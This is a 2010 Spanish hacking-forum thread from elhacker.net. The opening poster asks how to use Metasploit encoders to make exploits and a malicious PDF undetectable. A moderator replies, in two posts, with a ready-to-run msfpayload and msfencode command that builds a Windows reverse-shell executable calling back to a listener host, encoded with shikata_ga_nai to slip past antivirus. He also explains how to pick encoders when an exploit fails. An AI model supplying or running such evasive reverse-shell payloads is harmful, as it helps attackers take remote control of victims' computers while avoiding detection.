elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado:


+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Hacking (Moderador: toxeek)
| | |-+  Encoders de Metasploit
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: Encoders de Metasploit  (Leído 6,317 veces)
illera88


Desconectado Desconectado

Mensajes: 397


Ver Perfil
Encoders de Metasploit
« en: 18 Febrero 2010, 12:06 pm »

Pues lo dicho. ¿Cómo se usal los encoders de metasploit para hacer indetectables nuestros exploits?
¿Se pude hacer indetectabel con el msf un pdf con un exploit incrustado y con un payload reverse_tcp??

Un saludo
En línea

Shell Root
Moderador Global
***
Desconectado Desconectado

Mensajes: 3.723


<3


Ver Perfil WWW
Re: Encoders de Metasploit
« Respuesta #1 en: 18 Febrero 2010, 17:31 pm »

mmm Los Encoders son usandos de 2 formás!

1. Dentro de la consola Shell de Linux (Pará ver las opciones ejecutar ./msfencode -h)
Código:
shell@Alex:~/msf3$ ./msfencode -h

y para usarlo con un archivo binario. Así:
Código:
shell@Alex:~/msf3$ ./msfpayload windows/shell_reverse_tcp LHOST=172.0.0.1 LPORT=1234 R | ./msfencode -e x86/shikata_ga_nai -t exe > /home/shellroot/Archivo_Codificado1.exe

2. Al momento de lanzar un Exploit
En ocasiones al momento de lanzar un exploit, nos saldra un hermoso mensaje de... Exploit failed: No encoders encoded the buffer successfully... ahora para solucionar este failed, ejecutamos show encoders, para visualizar los que son soportados por el exploit, y despues, SET Nombre_Encoder.



Con respecto a la otra duda, de encodear un archivo *.PDF, no tengo ni la más minima idea... xD
En línea

Por eso no duermo, por si tras mi ventana hay un cuervo. Cuelgo de hilos sueltos sabiendo que hay veneno en el aire.
alexkof158


Desconectado Desconectado

Mensajes: 415


LOL


Ver Perfil
Re: Encoders de Metasploit
« Respuesta #2 en: 23 Febrero 2010, 17:34 pm »

vale tenia en mente esto, seria en vez de poner aaa.exe poner el dd.pdf no?? a ver si se podra encodear este archivo? 
« Última modificación: 23 Febrero 2010, 17:46 pm por alexkof158 » En línea

"noproxy"
Shell Root
Moderador Global
***
Desconectado Desconectado

Mensajes: 3.723


<3


Ver Perfil WWW
Re: Encoders de Metasploit
« Respuesta #3 en: 23 Febrero 2010, 19:00 pm »

Lo dudo alexkof158, ya que estamos refiriendonos a un Ejecutable. Mirad...
Código:
shell@Alex:~/msf3$ ./msfpayload windows/shell_reverse_tcp LHOST=172.0.0.1 LPORT=1234 R | ./msfencode -e x86/shikata_ga_nai -t exe > /home/shellroot/Archivo_Codificado1.exe
En la siguiente cadena, nos referimos a un Archivo Ejecutable
Código:
shell@Alex:~/msf3$  [...] exe > /home/shellroot/Archivo_Codificado1.exe
En línea

Por eso no duermo, por si tras mi ventana hay un cuervo. Cuelgo de hilos sueltos sabiendo que hay veneno en el aire.
Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
Encoders a un payload binario en metaexploit
Hacking
dairus20 1 3,167 Último mensaje 28 Marzo 2011, 00:17 am
por dairus20
como se utilizan los encoders de metasploit? gracias
Bugs y Exploits
teloponeahi 3 5,703 Último mensaje 4 Marzo 2015, 23:29 pm
por ElP4nd4N3gro
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines